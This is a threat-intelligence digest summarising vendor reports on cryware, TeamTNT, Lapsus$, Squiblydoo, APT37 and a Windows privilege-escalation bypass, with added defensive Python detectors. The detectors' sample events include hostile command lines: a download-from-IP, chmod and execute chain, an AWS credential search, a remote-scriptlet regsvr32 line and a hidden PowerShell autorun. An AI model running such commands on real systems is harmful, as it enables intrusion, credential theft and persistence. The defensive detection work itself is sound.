Cryware

May 24, 2022

Industry: N/A | Level: Strategic | Source: Microsoft

Microsoft’s latest research investigates the rise of Cryware targeting hot wallets (non-custodial cryptocurrency wallets). Cryware takes advantage of the accessibility of data stored locally on a user’s device to steal information and conduct crypto transactions. An attacker’s objective is to obtain data associated with the hot wallet, including private keys, seed phrases, and wallet addresses. With that information a transaction can be initiated without the victim’s consent, and because blockchain transactions are irreversible, the victim is unable to recover their funds. Because wallet data (private key, seed phrase, and wallet address) follows known string formats, attackers can craft regular expressions (regexes) to locate it using a variety of techniques, including memory dumping, keylogging, exfiltrating the wallet’s application storage files, and clipping and switching. Microsoft describes the clipping and switching technique as follows: “a Cryware monitors the contents of a user’s clipboard and uses string search patterns to look for and identify a string resembling a hot wallet address. If the target user pastes or uses CTRL + V into an application window, the Cryware replaces the object in the clipboard with the attacker’s address.”
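The same string patterns Microsoft says clippers use to recognise wallet addresses can be turned around defensively: a wallet or payment application can compare what the user copied with what actually landed in the paste target and refuse to proceed when a different, well-formed address shows up. The example below is added here and is not Microsoft's code; the address regexes are simplified assumptions (they do not checksum-verify), and the sample addresses and the `check_paste` function are constructed for illustration.

```python
import re

# Simplified patterns for common hot-wallet address formats. These are assumptions
# constructed for this example; production checks should also verify checksums.
WALLET_PATTERNS = {
    "bitcoin_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "bitcoin_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{39,59}$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text):
    """Return the name of the wallet format `text` resembles, or None."""
    text = text.strip()
    for name, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def check_paste(copied, pasted):
    """Compare the address the user copied with what arrived in the paste target.

    Returns one of:
      "not_wallet" - neither string looks like a wallet address, nothing to check
      "ok"         - the pasted text is exactly what was copied
      "swapped"    - a different, well-formed wallet address was pasted (clipper behaviour)
      "altered"    - the address was changed into something that is not a valid address
    """
    copied_kind = classify_address(copied)
    pasted_kind = classify_address(pasted)
    if copied_kind is None and pasted_kind is None:
        return "not_wallet"
    if copied.strip() == pasted.strip():
        return "ok"
    if pasted_kind is not None:
        return "swapped"
    return "altered"


# Constructed sample addresses (not real wallets).
COPIED_ETH = "0x" + "ab" * 20
SWAPPED_ETH = "0x" + "cd" * 20
COPIED_BTC = "1" + "A" * 33

if __name__ == "__main__":
    for copied, pasted in [(COPIED_ETH, COPIED_ETH), (COPIED_ETH, SWAPPED_ETH),
                           (COPIED_BTC, "1" + "B" * 33), ("hello world", "hello world")]:
        print(check_paste(copied, pasted))
```

A "swapped" result is the signature of clipping and switching: the clipboard still holds a syntactically valid address, just not the one the user chose, which is why a naive format check alone does not catch it and the comparison against the original must happen in the application.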

TeamTNT Scripts

April 26, 2022

Industry: N/A | Level: Tactical | Source: CiscoTalos

Cisco Talos has examined various script files used by the threat group TeamTNT against AWS and Alibaba. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. Their capabilities vary: they can initiate cryptocurrency mining, gather credentials, download additional payloads, modify file permissions, disable tools, and achieve persistence and lateral movement. An AWS credential discovery and theft script, “GRABBER_aws_cloud.sh”, enumerates the host’s directories querying for the string AWS; when matches are identified, the script writes the results to a file, exfiltrates the data, and deletes the created file. Scripts that download payloads often check the system’s architecture to ensure a compatible script is downloaded for execution. TeamTNT is quite proficient in the cloud space: in addition to its abundance of robust scripts, the group has used techniques observed by Trend Micro, Cado Security, and Cisco Talos to disable cloud security tooling and cloud logging. Whilst agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted, Cisco Talos observed some omissions: “TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools.”

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Locate Credentials
    • Linux CURL or WGET Direct to IPv4 Address
    • File Download (Unix)
    • Rare shell script execution
    • Service Stop Commands
    • Output to File
    • Modify File Attributes
    • New Linux Service Started/Enabled
    • File Modified for Execution
    • File Execution (Unix)
    • New Docker Container
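The behaviours listed above (download from a raw IPv4 address, credential search, service stop, file made executable, then execution of the downloaded file) map naturally onto detection logic over Linux process telemetry. The example below is an added illustration, not Cisco Talos' or Anvilogic's code: the `ProcEvent` layout, the sample command lines (using the documentation range 203.0.113.0/24) and the rule names are constructed for this example, and the final correlation step implements the "download, modified, executed" chain on one host.

```python
import os
import re
from collections import defaultdict, namedtuple

# One process-execution record: host, user and the full command line (constructed layout).
ProcEvent = namedtuple("ProcEvent", "host user cmd")

URL_RE = re.compile(r"\b(?:https?|ftp)://([^/\s:]+)(?::\d+)?(/\S*)?")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
CRED_HINT_RE = re.compile(r"\bAWS\b|\.aws/credentials|aws_access_key_id|aws_secret_access_key", re.I)
SERVICE_STOP_RE = re.compile(r"\bsystemctl\s+(?:stop|disable)\b|\bservice\s+\S+\s+stop\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(\S+)\s+(\S+)")
SEARCH_TOOLS = {"grep", "egrep", "find", "cat", "ls"}
INTERPRETERS = {"sh", "bash", "dash", "sudo", "nohup"}

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("web-01", "www-data", "curl -s http://203.0.113.10/x.sh -o /tmp/x.sh"),
    ProcEvent("web-01", "www-data", "chmod +x /tmp/x.sh"),
    ProcEvent("web-01", "www-data", "/bin/sh /tmp/x.sh"),
    ProcEvent("web-01", "root", "grep -rli AWS /root /home /etc"),
    ProcEvent("web-01", "root", "systemctl stop aliyun.service"),
    ProcEvent("web-01", "root", "curl -s https://example.com/update.sh"),
    ProcEvent("build-02", "jenkins", "wget https://files.example.com/tool.tar.gz"),
]


def download_target(cmd):
    """For a curl/wget command return (remote_host, local_filename), else None."""
    tokens = cmd.split()
    if not tokens or os.path.basename(tokens[0]) not in ("curl", "wget"):
        return None
    m = URL_RE.search(cmd)
    if not m:
        return None
    remote_host, path = m.group(1), m.group(2) or "/"
    local = None
    for flag in ("-o", "-O"):
        if flag in tokens:
            i = tokens.index(flag)
            # curl's bare -O takes no argument; only accept a following non-URL token
            if i + 1 < len(tokens) and not URL_RE.match(tokens[i + 1]):
                local = tokens[i + 1]
    if local is None:
        local = path.rsplit("/", 1)[-1] or None
    return remote_host, local


def mode_adds_exec(mode):
    """True if a chmod mode string grants execute permission."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "x" in mode and not mode.startswith("-")


def analyze(events):
    """Return (findings, scenarios): per-event rule hits and the correlated chain."""
    findings = []
    downloaded, chmodded, executed = defaultdict(set), defaultdict(set), defaultdict(set)
    for ev in events:
        tokens = ev.cmd.split()
        tool = os.path.basename(tokens[0]) if tokens else ""
        tgt = download_target(ev.cmd)
        if tgt:
            remote_host, local = tgt
            if IPV4_RE.match(remote_host):
                findings.append(("curl_wget_to_ipv4", ev.host, ev.cmd))
            if local:
                downloaded[ev.host].add(local)
        if tool in SEARCH_TOOLS and CRED_HINT_RE.search(ev.cmd):
            findings.append(("locate_credentials", ev.host, ev.cmd))
        if SERVICE_STOP_RE.search(ev.cmd):
            findings.append(("service_stop", ev.host, ev.cmd))
        m = CHMOD_RE.search(ev.cmd)
        if m and mode_adds_exec(m.group(1)):
            findings.append(("file_modified_for_execution", ev.host, ev.cmd))
            chmodded[ev.host].add(m.group(2))
        # the first token that is not a shell/wrapper is the program being run
        heads = [t for t in tokens if os.path.basename(t) not in INTERPRETERS]
        if heads and heads[0] in downloaded[ev.host]:
            executed[ev.host].add(heads[0])
    scenarios = []
    for host in sorted(downloaded):
        for path in sorted(downloaded[host] & chmodded[host] & executed[host]):
            scenarios.append(("unix_file_download_modified_executed", host, path))
    return findings, scenarios


if __name__ == "__main__":
    hits, chains = analyze(SAMPLE_EVENTS)
    for h in hits:
        print("finding:", h)
    for c in chains:
        print("scenario:", c)
```

The individual rules are noisy on their own (administrators also run chmod and stop services); the value is in the correlation, where a file fetched from a bare IP address, made executable and then run on the same host is rarely benign.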

Microsoft Confirms LAPSUS$ Hack & Analysis

March 29, 2022

Industry: Technology | Level: Strategic | Source: Microsoft

Microsoft’s security teams provide analysis of the Lapsus$ data extortion group (tracked by Microsoft as DEV-0537). Microsoft also confirms its own breach by Lapsus$, which compromised project source code for Bing and Cortana. Microsoft’s statement on the impact and cause says: “no customer code or data was involved in the observed activities. Our investigation has found a single account had been compromised, granting limited access. Our cybersecurity response teams quickly engaged to remediate the compromised account and prevent further activity.” Microsoft shares details of the observed tactics, techniques and procedures (TTPs). Initial access is obtained in a manner similar to most threat actor groups: gathering credentials from information-stealing malware such as RedLine, purchasing access through access brokers, and recruiting insiders at target companies (targeted industries include telecommunications and technology). For reconnaissance and privilege escalation, the group targets vulnerabilities on internal servers and searches internal repositories for credentials and secrets. The group gathers intelligence by joining crisis calls and/or observing internal message channels to understand the organization’s incident response workflow. In the final stages of an attack, the actors often create global admin accounts on cloud tenants: “If they successfully gain privileged access to an organization’s cloud tenant (either AWS or Azure), DEV-0537 creates global admin accounts in the organization’s cloud instances, sets an Office 365 tenant-level mail transport rule to send all mail in and out of the organization to the newly created account, and then removes all other global admin accounts, so only the actor has sole control of the cloud resources, effectively locking the organization out of all access. After exfiltration, DEV-0537 often deletes the target’s systems and resources.” The attackers use a VPN for data exfiltration; however, they are cognizant of alerts such as impossible travel and select a geographically sensible egress location based on their target.
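The two tenant-level actions Microsoft describes (a transport rule that copies all mail to a freshly created account, followed by removal of every other global admin) are both visible in cloud audit logs and can be detected by replaying them. The example below is added here and is not Microsoft's detection logic: the flat event layout and sample events are constructed, the operation names follow the Azure AD and Exchange admin audit vocabulary, and the transport rule parameter names (BlindCopyTo, RedirectMessageTo and the narrowing conditions) are the real Exchange Online ones.

```python
from datetime import datetime, timedelta

# Global Administrator holders known before the window (constructed for this example).
INITIAL_GLOBAL_ADMINS = {"alice@contoso.example", "bob@contoso.example", "carol@contoso.example"}

# Constructed, simplified audit events. The flat field layout is an assumption of this
# example, not any product's schema.
SAMPLE_EVENTS = [
    {"time": "2022-03-20T01:02:00", "op": "Add user", "actor": "bob@contoso.example",
     "target": "svc-sync@contoso.example"},
    {"time": "2022-03-20T01:05:00", "op": "Add member to role", "actor": "bob@contoso.example",
     "target": "svc-sync@contoso.example", "role": "Global Administrator"},
    {"time": "2022-03-20T01:09:00", "op": "New-TransportRule", "actor": "svc-sync@contoso.example",
     "params": {"Name": "Archive", "BlindCopyTo": "svc-sync@contoso.example"}},
    {"time": "2022-03-20T01:12:00", "op": "Remove member from role", "actor": "svc-sync@contoso.example",
     "target": "alice@contoso.example", "role": "Global Administrator"},
    {"time": "2022-03-20T01:13:00", "op": "Remove member from role", "actor": "svc-sync@contoso.example",
     "target": "bob@contoso.example", "role": "Global Administrator"},
    {"time": "2022-03-20T01:14:00", "op": "Remove member from role", "actor": "svc-sync@contoso.example",
     "target": "carol@contoso.example", "role": "Global Administrator"},
]

# Transport rule parameters that send a copy of (or redirect) a message elsewhere,
# and the conditions that narrow a rule to a subset of mail.
FORWARD_PARAMS = {"BlindCopyTo", "RedirectMessageTo", "CopyTo"}
SCOPE_PARAMS = {"From", "SentTo", "FromMemberOf", "SentToMemberOf", "FromScope", "SentToScope",
                "SubjectContainsWords", "SenderDomainIs", "RecipientDomainIs"}


def _t(s):
    return datetime.fromisoformat(s)


def find_tenant_wide_forwarding(events, window=timedelta(hours=24)):
    """Flag transport rules that copy or redirect mail.

    A rule with none of the narrowing conditions in SCOPE_PARAMS applies to every
    message in and out of the tenant. The alert also records whether the destination
    mailbox was created inside `window` before the rule, the DEV-0537 pattern.
    """
    created = {e["target"]: _t(e["time"]) for e in events if e["op"] == "Add user"}
    alerts = []
    for e in events:
        if e["op"] not in ("New-TransportRule", "Set-TransportRule"):
            continue
        params = e.get("params", {})
        destinations = [params[p] for p in sorted(FORWARD_PARAMS) if p in params]
        if not destinations:
            continue
        tenant_wide = not (SCOPE_PARAMS & set(params))
        for dest in destinations:
            fresh = dest in created and timedelta(0) <= _t(e["time"]) - created[dest] <= window
            alerts.append({"rule": "mail_forwarding_transport_rule", "time": e["time"],
                           "actor": e["actor"], "destination": dest,
                           "tenant_wide": tenant_wide, "destination_is_new_account": fresh})
    return alerts


def find_global_admin_lockout(events, initial_admins):
    """Replay Global Administrator role changes; alert when every pre-existing admin
    has been removed and only accounts added during the window remain."""
    admins, added, removed = set(initial_admins), set(), set()
    for e in events:
        if e.get("role") != "Global Administrator":
            continue
        if e["op"] == "Add member to role":
            admins.add(e["target"])
            added.add(e["target"])
        elif e["op"] == "Remove member from role":
            admins.discard(e["target"])
            removed.add(e["target"])
    if removed and admins and admins <= added:
        return {"rule": "global_admin_lockout", "remaining_admins": sorted(admins),
                "removed_admins": sorted(removed)}
    return None


if __name__ == "__main__":
    for a in find_tenant_wide_forwarding(SAMPLE_EVENTS):
        print(a)
    print(find_global_admin_lockout(SAMPLE_EVENTS, INITIAL_GLOBAL_ADMINS))
```

Either alert alone is worth a look; together, and attributed to the same recently created account, they describe the lockout sequence in the quoted text, which is why the replay keeps the actor and the account creation time alongside the rule hit.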

Trending regsvr32 & Squiblydoo Technique

February 15, 2022

Industry: N/A | Level: Tactical | Source: Uptycs

The native Windows program regsvr32, a living-off-the-land binary (LOLBin) of choice, has been seen with increased usage in the wild by the Uptycs threat research team. The utility is combined with the Squiblydoo technique, which MITRE describes as follows: “Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting.” Additional insight from the Uptycs team has identified “over 500+ samples” leveraging regsvr32 to register OCX files associated with ActiveX controls. The majority of samples abusing regsvr32 have been Microsoft Excel files, followed by rich text files and Microsoft Word documents.

  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • Suspicious process Spawned by Java

Gamaredon/ACTINIUM & Ukraine

February 08, 2022

In-depth research by Palo Alto Unit 42 and the Microsoft Threat Intelligence Center (MSTIC) found that the threat group Gamaredon/ACTINIUM has been actively targeting organizations in Ukraine.

New Device Registration Tactic

February 01, 2022

Industry: N/A | Level: Tactical | Source: Microsoft

Research from Microsoft identified threat activity in which attackers take advantage of user accounts that have no device registered for MFA. The attackers then use those accounts to register their own devices in the target organization’s Azure Active Directory. The threat occurs in two waves. The first is a phishing campaign aiming to steal credentials and add an Outlook rule; the Outlook rule has a consistent pattern, with over one hundred identified mailboxes having the specific rule entry. The second wave uses the stolen credentials to gain access and expand the attackers’ foothold in the target’s environment. Targeted organizations were located mostly in Australia, Singapore, Indonesia, and Thailand.

  • Anvilogic Use Cases:
    • O365 Inbox Rules
    • Add user to Azure AD Group or Role

InstallerFileTakeOver in use by Threat Actors

November 24, 2021

Industry: N/A | Level: Tactical | Source: CiscoTalos

A follow-up on the vulnerability identified by security researcher Abdelhamid Naceri: a bypass of the patch for CVE-2021-41379, which Microsoft did not properly fix in November 2021’s Patch Tuesday. The vulnerability enables a user to elevate their privileges to administrator. Cisco Talos has identified malware samples in the wild taking advantage of this vulnerability.

  • Anvilogic Use Case: Potential InstallerFileTakeOver CVE-2021-41379

APT37 and Chinotto Malware

November 24, 2021

Industry: Media & Nonprofit | Level: Tactical | Source: SecureList

The North Korean state-sponsored group APT37 (also tracked as ScarCruft and Temp.Reaper) has been identified by Kaspersky targeting South Korean journalists, defectors, and human rights activists. The group used the Chinotto malware, distributed through watering holes, spear-phishing emails, and smishing attacks. A news organization had data stolen, and evidence showed the attackers had access to its environment for several months. Versions of the malware were observed for PowerShell, Windows, and Android, with similar HTTP-based command and control schemes. Additional capabilities observed include modifying registry keys (specifically enabling trust access for VBA), registering a PowerShell command in the Run registry key for persistence that executes an HTA file with mshta, and collecting files staged in a bat folder.

  • Anvilogic Scenario: APT37 & “Chinotto” Malware
  • Anvilogic Use Cases:
    • Query Registry
    • New AutoRun Registry Key
    • MSHTA.exe execution
    • Data Staged to File
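The regsvr32/Squiblydoo entry above and this APT37 entry both come down to a handful of Windows telemetry checks: regsvr32 loading a remote scriptlet or being spawned by an Office application, mshta executing an HTA file, a new Run key pointing at a script host, and the Office AccessVBOM value being switched on. The example below is an added illustration, not Uptycs', Kaspersky's or Anvilogic's code; the event layout, the `analyze` function and rule names are constructed, the sample command lines use the documentation range 203.0.113.0/24, and the Squiblydoo sample line is the publicly documented MITRE form of the technique included only so the detector has something to match.

```python
import re

# Constructed sample telemetry (process creations and registry value writes). The flat
# dict layout is an assumption of this example, not a product's schema.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r"regsvr32.exe /s /u /i:http://203.0.113.5/file.sct scrobj.dll"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"regsvr32.exe C:\Windows\System32\msxml3.dll"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r'powershell.exe -w hidden -c "mshta C:\Users\Public\update.hta"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Office\16.0\Word\Security",
     "value": "AccessVBOM", "data": "1"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"mshta C:\Users\Public\update.hta"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe notes.txt"},
]

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$", re.I)
OFFICE_SECURITY_RE = re.compile(r"\\Software\\Microsoft\\Office\\[\d.]+\\\w+\\Security$", re.I)
SCRIPT_HOST_RE = re.compile(r"\b(powershell|mshta|wscript|cscript|cmd|rundll32|regsvr32)(\.exe)?\b", re.I)
REMOTE_SCRIPTLET_RE = re.compile(r"[/-]i:\s*https?://")
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}


def basename(path):
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(e):
    """Rule hits for one process-creation event."""
    hits = []
    img, parent = basename(e["image"]), basename(e.get("parent", ""))
    low = e.get("cmdline", "").lower()
    if img == "regsvr32.exe":
        hits.append("regsvr32_execution")
        # Squiblydoo: scrobj.dll plus an /i: argument that points at a URL
        if "scrobj.dll" in low and REMOTE_SCRIPTLET_RE.search(low):
            hits.append("squiblydoo_remote_scriptlet")
        if parent in OFFICE_APPS:
            hits.append("regsvr32_spawned_by_office")
    if img == "mshta.exe" and (".hta" in low or "http" in low):
        hits.append("mshta_execution")
    return hits


def check_registry(e):
    """Rule hits for one registry value-set event."""
    hits = []
    key, value, data = e["key"], e.get("value", ""), str(e.get("data", ""))
    if RUN_KEY_RE.search(key):
        hits.append("new_autorun_registry_key")
        if SCRIPT_HOST_RE.search(data):
            hits.append("autorun_via_script_host")
    # AccessVBOM = 1 grants programmatic access to the VBA project model
    if OFFICE_SECURITY_RE.search(key) and value.lower() == "accessvbom" and data.strip() in ("1", "0x1"):
        hits.append("vba_trust_access_enabled")
    return hits


def analyze(events):
    """Map event index -> list of rule hits, omitting events with no hits."""
    results = {}
    for i, e in enumerate(events):
        hits = check_process(e) if e["type"] == "process" else check_registry(e)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in analyze(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["type"], hits)
```

Plain `regsvr32_execution` fires on legitimate installers too (the msxml3.dll sample above is benign), so the parent-process and remote-scriptlet qualifiers are what make the alert actionable; likewise the Run key rule is far more interesting when the data names a script host than when it names an installed application.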

CVE-2021-41379 Patch Bypass = InstallerFileTakeOver

November 23, 2021

Industry: N/A | Level: Tactical | Source: BleepingComputer

Security researcher Abdelhamid Naceri was able to bypass the patch Microsoft released as part of the November 2021 patch cycle for the vulnerability tracked as CVE-2021-41379. The exploit is tracked under the name InstallerFileTakeOver. It affects all supported versions of Windows, including Windows 10, Windows 11 and Windows Server 2022, enabling a user to obtain admin-level privileges. BleepingComputer validated the ease of use of the exploit: it “tested the exploit and used it to open to command prompt with SYSTEM privileges from an account with only low-level ‘Standard’ privileges. Using this vulnerability, threat actors with limited access to a compromised device can easily elevate their privileges to help spread laterally within the network.”

  • Anvilogic Use Case: Potential InstallerFileTakeOver CVE-2021-41379